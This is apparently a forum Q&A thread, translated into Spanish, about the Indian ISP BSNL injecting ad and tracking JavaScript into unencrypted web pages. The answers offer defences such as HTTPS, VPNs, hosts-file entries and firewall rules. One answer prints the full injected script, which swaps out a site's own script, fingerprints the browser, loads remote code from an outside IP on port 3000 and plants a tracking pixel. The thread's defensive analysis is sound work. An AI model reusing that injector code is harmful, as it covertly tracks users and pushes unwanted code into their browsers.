Mi ISP (BSNL India) está inyectando anuncios utilizando Phozeca, lo que estropea los sitios web y los hace insensibles. ¿Se puede hacer algo?

Navega tus respuestas
5

Recientemente he tenido un problema en el que mi ISP (BSNL India) ha estado inyectando anuncios / códigos extraños de seguimiento de Javascript en mi navegador, lo que hace que el sitio web sea inutilizable y no responda.

También he escrito un artículo sobre esto: enlace

Puedes leer eso para entender qué está sucediendo exactamente. Puede consultar el artículo anterior para ver qué está haciendo el código inyectado.

Estoy seguro de que este es mi ISP porque el dominio comienza con "bsnl.phozeca.com" y usa el puerto "3000".

Puntos a tener en cuenta: - La inyección de código solo funciona en sitios que no son HTTPS, como Steam Store y otros sitios web que no son HTTPS.

: el código que se está inyectando utiliza el puerto 3000.

: sitios web que funcionan mal cuando el CSP (Política de seguridad de contenido) está desactivado en el navegador.

-Los sitios web que funcionan mal funcionan correctamente en el navegador Tor.

-He investigado personalmente sobre este asunto, y después de leer el código (lea mi artículo para saber de qué estoy hablando), y después de leer el código, llamé a la función "loadnewads ()" desde el código , y una vez que se llama, aparecen anuncios extraños, como anuncios falsos de Flash Player y botones de descarga falsos.

-Cosas he tratado de resolver este problema.- 1) Comprobando el archivo hosts y bloqueando el dominio: No funciona. El script todavía está siendo inyectado.

2) Escaneando la PC en busca de malware: no funciona. He escaneado con más de tres antivirus, incluyendo Malwarebytes, todavía no detecta nada.

3) Deshabilitar CSP (Política de seguridad de contenido): ¡Funcionó! Sin embargo, los anuncios comienzan a reproducirse automáticamente.

4) Se cambió el DNS al DNS de Google: no funciona.

¿Hay alguna manera de resolver este problema? Por favor ayuda. Gracias!

    
pregunta HDG390x 21.04.2017 - 20:51
fuente

4 respuestas

2

Primero trate de llevarse bien con su ISP para dejar de hacerlo (si corresponde)

Como mencionaste, HTTPS no se puede comprometer, como debería ser, así que intenta usar HTTPS siempre que sea posible.

Sobre tus próximos intentos

  

1) Comprobando el archivo de hosts y bloqueando el dominio: No funciona. los   El script todavía está siendo inyectado.

Debe funcionar, si no es así, lo estás haciendo mal. Otra forma es bloquear lo mismo con su módem o dominio de enrutador / bloque ip (o firewall)

Si su ISP es lo suficientemente inteligente, debería alojar los scripts con diferentes nombres de dominio, por lo que bloquearlos todos será difícil para usted.

  

2) Escaneando la PC en busca de malware

No funcionará, por supuesto

  

3) Deshabilitar CSP (Política de seguridad de contenido)

No tengo idea de qué es esto, pero dado que HTTP viene con seguridad cero, este CSP podría ser engañado o no puede decir si un contenido no está permitido (¿qué lógica?)

  

4) Se cambió el DNS al DNS de Google

Por supuesto, no funcionará, el problema que tienes es sobre la publicación dns. incluso si su ISP anula el resultado por resolución de dominio, aún es fácil colocar el complemento en http.

Soluciones 100% funcionales
Use una VPN o un túnel sun que se enlaza a servicios como el calamar en la parte posterior. Esto podría no funcionar si su ISP encuentra su conexión a la dirección IP de destino (ya sea VPN o sTunnel) como su política anti-publicidad.

50% de soluciones de trabajo
Bloquea todos los contenidos con el complemento de tu navegador de adblock (o cualquier otra cosa).

    
respondido por el user7859067 21.04.2017 - 23:47
fuente
2

Tuve problemas similares. Tengo un truco simple pero es temporal, pero está funcionando para mí y evitó que BSNL ISP dejara de rastrear y empujar malware AD emergente. Agregué una entrada de host en mi computadora para bsnl.phozeca.com y la señalé a localhost.

    
respondido por el Preetham Hegde 09.05.2017 - 23:50
fuente
1

Como sugirió Preetam: agregar más detalles.

  1. descargué el archivo de hosts desde enlace Reemplazado en esta ubicación C: \ Windows \ System32 \ drivers \ etc

  2. Si no sabe cómo reemplazar el archivo de hosts, puede seguir estas instrucciones enlace

  3. Para deshacerse de la ventana emergente de engine.spotscenered.info/link.engine?guid= Agregué las siguientes entradas dentro del archivo host:

    0.0.0.0 www.onclickmax.com
    0.0.0.0 bsnl.phozeca.com
    0.0.0.0 * .onclickmax.com
    0.0.0.0 phozeca.com
    0.0.0.0 c.phozeca.com

No veo ningún anuncio emergente ... ¡desaparecido!

    
respondido por el NarayanIyer 10.06.2017 - 15:43
fuente
1

Parece que el malware ha evolucionado.

Ahora usa una IP y se está inyectando en los archivos js de los sitios web 'http' (utiliza un proxy para analizar).

Por ejemplo, en el caso de bbc.co.uk, cuando el navegador solicita la siguiente url:

enlace

  

en lugar de la siguiente secuencia de comandos (original): 

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});
  

el malware (¿isp-end?) inyectó la siguiente secuencia de comandos jc: 

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

La solución que funcionó fue agregar una regla en el firewall para bloquear el puerto 3000 en el rango de bsnl : 117.192.0.0 117.255.255.255 (basado en la información de ultra-dns).

Hizo esto tanto a nivel de sistema como a nivel de enrutador asdl (ya que los dispositivos móviles que usan la red también se ven afectados).

Esperamos que esto minimice los conflictos con otras aplicaciones que usan el puerto 3000.

Para windows-os, el video sobre el puerto de bloqueo se puede encontrar aquí: enlace

Saludos

Ravindra

    
respondido por el Ravindra HV 18.08.2018 - 00:12
fuente

Lea otras preguntas en las etiquetas

Parte pública de la clave SSH (* .pub): ¿Guardar o destruir? ¿El hash de git commit prueba el historial hasta ese momento?